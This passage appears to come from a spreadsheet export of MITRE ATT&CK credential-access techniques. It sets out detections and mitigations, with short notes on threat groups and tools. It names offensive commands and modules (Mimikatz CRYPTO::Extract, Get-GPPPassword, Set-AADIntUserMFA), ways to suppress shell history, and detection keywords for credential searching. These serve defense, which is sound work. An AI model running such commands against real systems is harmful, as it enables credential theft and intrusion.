Starting in Windows 11 22H2, the `EnableMPRNotifications` policy can be disabled through Group Policy or through a configuration service provider to prevent Winlogon from sending credentials to network providers.(Citation: EnableMPRNotifications)
Restrict Registry Permissions
Restrict Registry permissions to disallow the modification of sensitive Registry keys such as `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may search for private key certificate files on compromised systems for insecurely stored credentials.
File Access
Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. 
Audit
Ensure only authorized keys are allowed access to critical resources and audit access lists regularly.
Encrypt Sensitive Information
When possible, store keys on separate cryptographic hardware instead of on the local system. For example, on Windows systems use a TPM to secure keys and other sensitive credential material.(Citation: Microsoft Primary Refresh Token)
Password Policies
Use strong passphrases for private keys to make cracking difficult.
Restrict File and Directory Permissions
Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Additionally, on Cisco devices, set the `nonexportable` flag during RSA key pair generation.(Citation: cisco_deploy_rsa_keys)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used [Mimikatz](https://attack.mitre.org/software/S0002) to dump certificates and private keys from the Windows certificate store.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained PKI keys, certificate files, and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.(Citation: Microsoft 365 Defender Solorigate)(Citation: Cybersecurity Advisory SVR TTP May 2021)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for unsecured SSH keys.(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Trend Micro TeamTNT)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can gather encryption keys from Azure AD services such as ADSync and Active Directory Federated Services servers.(Citation: AADInternals Documentation)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has intercepted unencrypted private keys as well as private key pass-phrases.(Citation: ESET Ebury Feb 2014)	
Empire
[Empire](https://attack.mitre.org/software/S0363) can use modules like &lt;code&gt;Invoke-SessionGopher&lt;/code&gt; to extract private key and session information.(Citation: Github PowerShell Empire)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) can retrieve token signing certificates and token decryption certificates from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has searched for private keys in .ssh.(Citation: Unit 42 Hildegard Malware)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has searched for private keys.(Citation: Aqua Kinsing April 2020)
Machete
[Machete](https://attack.mitre.org/software/S0409) has scanned and looked for cryptographic keys and certificate file extensions.(Citation: ESET Machete July 2019) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can collect a Chrome encryption key used to protect browser cookies.(Citation: SentinelLabs Metador Sept 2022)
Mimikatz
[Mimikatz](https://attack.mitre.org/software/S0002)'s &lt;code&gt;CRYPTO::Extract&lt;/code&gt; module can extract keys by interacting with Windows cryptographic application programming interface (API) functions.(Citation: Adsecurity Mimikatz Guide)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) can steal keys for VPNs and cryptocurrency wallets.(Citation: Kaspersky Adwind Feb 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor application logs for activity that may highlight malicious attempts to access application data, especially abnormal search activity targeting passwords and other artifacts related to credentials.(Citation: Slack Help Center Access Logs)
Audit
Preemptively search through communication services to find shared unsecured credentials. Searching for common patterns like "&lt;code&gt;password is &lt;/code&gt;", “&lt;code&gt;password=&lt;/code&gt;” and take actions to reduce exposure when found. 
User Training
Ensure that developers and system administrators are aware of the risk associated with sharing unsecured passwords across communication services.
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has targeted various collaboration tools like Slack, Teams, JIRA, Confluence, and others to hunt for exposed credentials to support privilege escalation and lateral movement.(Citation: MSTIC DEV-0537 Mar 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">User Account Authentication
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Disable or Remove Feature or Program
Disable unnecessary metadata services and restrict or disable insecure versions of metadata services that are in use to prevent adversary access.(Citation: Amazon AWS IMDS V2)
Filter Network Traffic
Limit access to the Instance Metadata API. A properly configured Web Application Firewall (WAF) may help prevent external adversaries from exploiting Server-side Request Forgery (SSRF) attacks that allow access to the Cloud Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
Limit Access to Resource Over Network
Limit access to the Instance Metadata API using a host-based firewall such as iptables.
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has queried the AWS instance metadata service for credentials.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has queried the Cloud Instance Metadata API for cloud credentials.(Citation: Unit 42 Hildegard Malware)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can query the query AWS and GCP metadata APIs for secrets.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.
User Account Authentication
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).
Limit Access to Resource Over Network
Limit communications with the container service to managed and secured channels, such as local Unix sockets or remote access via SSH. Require secure port access to communicate with the APIs over TLS by disabling unauthenticated access to the Docker API and Kubernetes API Server.(Citation: Docker Daemon Socket Protect)(Citation: Kubernetes API Control Access) In Kubernetes clusters deployed in cloud environments, use native cloud platform features to restrict the IP ranges that are permitted to access to API server.(Citation: Kubernetes Cloud Native Security) Where possible, consider enabling just-in-time (JIT) access to the Kubernetes API to place additional restrictions on access.(Citation: Microsoft AKS Azure AD 2023)
Network Segmentation
Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls.
Privileged Account Management
Use the principle of least privilege for privileged accounts such as the service account in Kubernetes. For example, if a pod is not required to access the Kubernetes API, consider disabling the service account altogether.(Citation: Kubernetes Service Accounts)
User Account Management
Enforce authentication and role-based access control on the container API to restrict users to the least privileges required.(Citation: Kubernetes Hardening Guide) When using Kubernetes, avoid giving users wildcard permissions or adding users to the `system:masters` group, and use `RoleBindings` rather than `ClusterRoleBindings` to limit user privileges to specific namespaces.(Citation: Kubernetes RBAC)
Peirates
[Peirates](https://attack.mitre.org/software/S0683) can query the Kubernetes API for secrets.(Citation: Peirates GitHub)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)
Domain Controllers: "Audit Logon" (Success &amp; Failure) for event ID 4625.
Domain Controllers: "Audit Kerberos Authentication Service" (Success &amp; Failure) for event ID 4771.
All systems: "Audit Logon" (Success &amp; Failure) for event ID 4648.(Citation: Mandiant Cloudy Logs 2023)
User Account Authentication
 Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.(Citation: Mandiant Cloudy Logs 2023)
Account Use Policies
Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out. Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Multi-factor Authentication
Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a brute-force/password-spray tooling that operated in two modes: in password-spraying mode it conducted approximately four authentication attempts per hour per targeted account over the course of several days or weeks.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: Microsoft Targeting Elections September 2020) [APT28](https://attack.mitre.org/groups/G0007) has also used a Kubernetes cluster to conduct distributed, large-scale password spray attacks.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has conducted brute force password spray attacks.(Citation: MSRC Nobelium June 2021)(Citation: MSTIC Nobelium Oct 2021)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used multiple password spraying attacks against victim's remote services to obtain valid user and administrator accounts.(Citation: NCC Group Chimera January 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used password spraying attacks to obtain valid credentials.(Citation: SecureWorks August 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster RATs)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called Total SMB BruteForcer to perform internal password spraying.(Citation: Symantec Leafminer July 2018)
Silent Librarian
[Silent Librarian](https://attack.mitre.org/groups/G0122) has used collected lists of names and e-mail accounts to use in password spraying attacks against private sector targets.(Citation: DOJ Iran Indictments March 2018)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606)’s &lt;code&gt;infpub.dat&lt;/code&gt; file uses NTLM login credentials to brute force Windows machines.(Citation: Secure List Bad Rabbit)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force credential authentication by using a supplied list of usernames and a single password.(Citation: CME Github September 2018)
Linux Rabbit
[Linux Rabbit](https://attack.mitre.org/software/S0362) brute forces SSH passwords in order to attempt to gain access and install its malware onto the server. (Citation: Anomali Linux Rabbit 2018)
MailSniper
[MailSniper](https://attack.mitre.org/software/S0413) can be used for password spraying against Exchange and Office 365.(Citation: GitHub MailSniper)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may search for SYSVOL data and/or GPP XML files, especially on compromised domain controllers.
File Access
Monitor for attempts to access SYSVOL that involve searching for XML files.
Active Directory Configuration
Remove vulnerable Group Policy Preferences.(Citation: Microsoft MS14-025)
Audit
Search SYSVOL for any existing GGPs that may contain credentials and remove them.(Citation: ADSecurity Finding Passwords in SYSVOL)
Update Software
Apply patch KB2962486 which prevents credentials from being stored in GPPs.(Citation: ADSecurity Finding Passwords in SYSVOL)(Citation: MS14-025)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used a variety of publicly available tools like Gpppassword to gather credentials.(Citation: Symantec Elfin Mar 2019)(Citation: FireEye APT33 Guardrail)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used PowerShell cmdlets `Get-GPPPassword` and `Find-GPOPassword` to find unsecured credentials in a compromised network group policy.(Citation: Mandiant FIN12 Oct 2021)
PowerSploit
[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) has a module that can extract cached GPP passwords.(Citation: GitHub SILENTTRINITY Modules July 2019) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor application logs for activity that may highlight malicious attempts to access application data, especially abnormal search activity targeting passwords and other artifacts related to credentials.(Citation: Slack Help Center Access Logs)
Command Execution
While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
File Access
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior. Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.
Process Creation
Monitor newly executed processes that may search compromised systems to find and obtain insecurely stored credentials.
User Account Authentication
Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may search compromised systems to find and obtain insecurely stored credentials.
Windows Registry Key Access
Monitor for unexpected windows registry key being accessed that may search compromised systems to find and obtain insecurely stored credentials.
Active Directory Configuration
Remove vulnerable Group Policy Preferences.(Citation: Microsoft MS14-025)
Audit
Preemptively search for files containing passwords or other credentials and take actions to reduce the exposure risk when found.
Encrypt Sensitive Information
When possible, store keys on separate cryptographic hardware instead of on the local system. 
Filter Network Traffic
Limit access to the Instance Metadata API. A properly configured Web Application Firewall (WAF) may help prevent external adversaries from exploiting Server-side Request Forgery (SSRF) attacks that allow access to the Cloud Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
Limit Access to Resource Over Network
Limit network access to sensitive services, such as the Instance Metadata API.
Operating System Configuration
There are multiple methods of preventing a user's command history from being flushed to their .bash_history file, including use of the following commands:
&lt;code&gt;set +o history&lt;/code&gt; and &lt;code&gt;set -o history&lt;/code&gt; to start logging again;
&lt;code&gt;unset HISTFILE&lt;/code&gt; being added to a user's .bash_rc file; and
&lt;code&gt;ln -s /dev/null ~/.bash_history&lt;/code&gt; to write commands to &lt;code&gt;/dev/null&lt;/code&gt;instead.
Password Policies
Use strong passphrases for private keys to make cracking difficult. Do not store credentials within the Registry. Establish an organizational policy that prohibits password storage in files.
Privileged Account Management
If it is necessary that software must store credentials in the Registry, then ensure the associated accounts have limited permissions so they cannot be abused if obtained by an adversary.
Restrict File and Directory Permissions
Restrict file shares to specific directories with access only to necessary users.
Update Software
Apply patch KB2962486 which prevents credentials from being stored in GPPs.(Citation: ADSecurity Finding Passwords in SYSVOL)(Citation: MS14-025)
User Training
Ensure that developers and system administrators are aware of the risk associated with having plaintext passwords in software configuration files that may be left on endpoint systems or servers.
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses an external software known as NetPass to recover passwords. (Citation: Cybereason Astaroth Feb 2019)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can search for sensitive data: for example, in Code Build environment variables, EC2 user data, and Cloud Formation templates.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.(Citation: Mandiant Cloudy Logs 2023)
User Account Authentication
 Monitor for many failed authentication attempts across various accounts that may result from password guessing attempts.(Citation: Mandiant Cloudy Logs 2023)
Account Use Policies
Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out. Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Multi-factor Authentication
Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
Update Software
Upgrade management services to the latest supported and compatible version.  Specifically, any version providing increased password complexity or policy enforcement preventing default or weak passwords. 
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days.(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020) [APT28](https://attack.mitre.org/groups/G0007) has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has successfully conducted password guessing attacks against a list of mailboxes.(Citation: Mandiant APT29 Microsoft 365 2022)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component can perform brute force password guessing against authentication portals.(Citation: FireEye Periscope March 2018)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can brute force passwords for a specified user on a single target system or across an entire network.(Citation: CME Github September 2018)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been observed using a hard coded list of passwords to brute force user accounts. (Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Secureworks Emotet Nov 2018)(Citation: CIS Emotet Dec 2018)(Citation: Binary Defense Emotes Wi-Fi Spreader)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can use a list of hardcoded credentials in attempt to authenticate to SMB shares.(Citation: ESET Hermetic Wizard March 2022)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) has attempted to brute force TCP ports 135 (RPC) and 1433 (MSSQL) with the default username or list of usernames and    passwords.(Citation: Unit 42 Lucifer June 2020)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.(Citation: ANSSI Sandworm January 2021)
Pony
[Pony](https://attack.mitre.org/software/S0453) has used a small dictionary of common passwords against a collected list of local accounts.(Citation: Malwarebytes Pony April 2016)	
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels. (Citation: CheckPoint SpeakUp Feb 2019)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.(Citation: Unit42 Xbash Sept 2018)(Citation: Trend Micro Xbash Sept 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. Consider focusing efforts on detecting other adversary behavior used to acquire credential materials, such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).
User Account Authentication
 Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. (ex: Windows EID 4625 or 5379)
Multi-factor Authentication
Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used Cain &amp; Abel to crack password hashes.(Citation: McAfee Night Dragon)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has been known to brute force password hashes to be able to leverage plain text credentials.(Citation: APT3 Adversary Emulation Plan)
APT41
[APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has dropped and executed tools used for password cracking, including Hydra and [CrackMapExec](https://attack.mitre.org/software/S0488).(Citation: US-CERT TA18-074A)(Citation: Kali Hydra)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016)
Net Crawler
[Net Crawler](https://attack.mitre.org/software/S0056) uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network.(Citation: Cylance Cleaver)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.(Citation: Mandiant Cloudy Logs 2023)
User Account Authentication
 Monitor for many failed authentication attempts across various accounts that may result from credential stuffing attempts.(Citation: Mandiant Cloudy Logs 2023)
Account Use Policies
Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out. Use conditional access policies to block logins from non-compliant devices or from outside defined organization IP ranges.(Citation: Microsoft Common Conditional Access Policies)
Multi-factor Authentication
Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.
Password Policies
Refer to NIST guidelines when creating password policies. (Citation: NIST 800-63-3)
User Account Management
Proactively reset accounts that are known to be part of breached credentials either immediately, or after detecting bruteforce attempts.
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used credential stuffing against victim's remote services to obtain valid accounts.(Citation: NCC Group Chimera January 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) uses brute-force attack against RDP with rdpscanDll module.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor property changes in Group Policy: &lt;code&gt;Computer Configuration\Windows Settings\Security Settings\Account Policies\Password Policy\Store passwords using reversible encryption&lt;/code&gt;. By default, the property should be set to Disabled.
Command Execution
Monitor command-line usage for &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt; or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). 
Script Execution
Consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;, that change account configurations.
User Account Metadata
Monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
Password Policies
Ensure that &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property is set to disabled unless there are application requirements.(Citation: store_pwd_rev_enc)
Privileged Account Management
Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account.(Citation: TechNet Credential Theft)(Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.(Citation: Microsoft Securing Privileged Access)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.
File Access
Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity.
Operating System Configuration
There are multiple methods of preventing a user's command history from being flushed to their .bash_history file, including use of the following commands:
&lt;code&gt;set +o history&lt;/code&gt; and &lt;code&gt;set -o history&lt;/code&gt; to start logging again;
&lt;code&gt;unset HISTFILE&lt;/code&gt; being added to a user's .bash_rc file; and
&lt;code&gt;ln -s /dev/null ~/.bash_history&lt;/code&gt; to write commands to &lt;code&gt;/dev/null&lt;/code&gt;instead.
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has searched &lt;code&gt;bash_history&lt;/code&gt; for credentials.(Citation: Aqua Kinsing April 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Monitor PAM configuration and module paths (ex: /etc/pam.d/) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Logon Session Creation
Monitor for newly constructed logon behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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Multi-factor Authentication
Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining control of valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information.
Privileged Account Management
Limit access to the root account and prevent users from modifying PAM components through proper privilege separation (ex SELinux, grsecurity, AppArmor, etc.) and limiting Privilege Escalation opportunities.
Ebury
[Ebury](https://attack.mitre.org/software/S0377) can deactivate PAM modules to tamper with the sshd configuration.(Citation: ESET Ebury Oct 2017)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users.(Citation: Trend Micro Skidmap)
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
Monitor for changes made to the checksum of the operating system file and verifying the image of the operating system in memory.(Citation: Cisco IOS Software Integrity Assurance - Image File Verification)(Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) Detection of this behavior may be difficult, detection efforts may be focused on closely related adversary behaviors, such as Modify System Image.
Multi-factor Authentication
Use multi-factor authentication for user and privileged accounts. Most embedded network devices support TACACS+ and/or RADIUS.  Follow vendor prescribed best practices for hardening access control. (Citation: Cisco IOS Software Integrity Assurance - TACACS)
Privileged Account Management
Restrict administrator accounts to as few individuals as possible, following least privilege principles.  Prevent credential overlap across systems of administrator and privileged accounts, particularly between network and non-network platforms, such as servers or endpoints.
SYNful Knock
[SYNful Knock](https://attack.mitre.org/software/S0519) has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.(Citation: Mandiant - Synful Knock)
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made to AD security settings related to MFA logon requirements, such as changes to Azure AD Conditional Access Policies or the registration of new MFA applications. 
Logon Session Creation
Monitor for logon sessions for user accounts and devices that did not require MFA for authentication.
User Account Authentication
Monitor for account authentications in which MFA credentials are not provided by the user account to the authenticating entity. 
User Account Modification
Monitor for the enrollment of devices and user accounts with alternative security settings that do not require MFA credentials for successful logon. Monitor for attempts to disable MFA on individual user accounts.(Citation: Mandiant Cloudy Logs 2023)
Audit
Review MFA actions alongside authentication logs to ensure that MFA-based logins are functioning as intended. Review user accounts to ensure that all accounts have MFA enabled.(Citation: Mandiant Cloudy Logs 2023)
Multi-factor Authentication
Ensure that MFA and MFA policies and requirements are properly implemented for existing and deactivated or dormant accounts and devices. If possible, consider configuring MFA solutions to "fail closed" rather than grant access in case of serious errors.
User Account Management
Ensure that proper policies are implemented to dictate the secure enrollment and deactivation of MFA for user accounts.
AADInternals
The [AADInternals](https://attack.mitre.org/software/S0677) `Set-AADIntUserMFA` command can be used to disable MFA for a specified user.
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made to AD security settings related to MFA logon requirements, such as changes to Azure AD Conditional Access Policies or the registration of new MFA applications.
Application Log Content
Enable security auditing to collect logs from hybrid identity solutions. For example, monitor sign-ins to the Azure AD Application Proxy Connector, which are typically generated only when a new Pass Through Authentication (PTA) Agent is added. (Citation: Mandiant Azure AD Backdoors) If AD FS is in use, review the logs for event ID 501, which specifies all EKU attributes on a claim, and raise alerts on any values that are not configured in your environment.(Citation: MagicWeb)
File Creation
Monitor for suspicious additions to the `/Library/Security/SecurityAgentPlugins` directory.(Citation: Xorrior Authorization Plugins)
Monitor for newly created files that may be used to register malicious network provider dynamic link libraries (DLLs).
File Modification
Monitor for suspicious modification of files associated with authentication processes, such as configuration files and module paths (e.g. `/etc/pam.d/`). Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files. Also monitor for access to certificates and cryptographic keys material.
Logon Session Creation
Monitor for newly constructed logon behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present)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Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) 
Module Load
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013) If AD FS is in use, monitor the AD FS server for the creation of DLLs as well as the loading of unrecognized or unsigned DLLs into the `Microsoft.IdentityServer.Servicehost` application.(Citation: MagicWeb)
OS API Execution
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)
Monitor for abnormal API calls to `NPLogonNotify()` that may highlight malicious network provider DLLs.(Citation: NPLogonNotify)
Process Access
Monitor for unexpected processes interacting with authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts.
User Account Authentication
Monitor for account authentications in which MFA credentials are not provided by the user account to the authenticating entity.
User Account Modification
Monitor for the enrollment of devices and user accounts with alternative security settings that do not require MFA credentials for successful logon.
Windows Registry Key Creation
Monitor for the addition of network provider Registry keys (e.g., `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\&lt;NetworkProviderName&gt;\NetworkProvider`).
Windows Registry Key Modification
Monitor for changes to Registry entries for password filters (ex: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages`) and correlate then investigate the DLL files these files reference.
Monitor for changes to Registry entries for network providers (e.g., `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order`) and correlate then investigate the DLL files these values reference.
Audit
Review authentication logs to ensure that mechanisms such as enforcement of MFA are functioning as intended.
Periodically review the hybrid identity solution in use for any discrepancies. For example, review all Pass Through Authentication (PTA) agents in the Azure Management Portal to identify any unwanted or unapproved ones.(Citation: Mandiant Azure AD Backdoors) If ADFS is in use, review DLLs and executable files in the AD FS and Global Assembly Cache directories to ensure that they are signed by Microsoft. Note that in some cases binaries may be catalog-signed, which may cause the file to appear unsigned when viewing file properties.(Citation: MagicWeb)
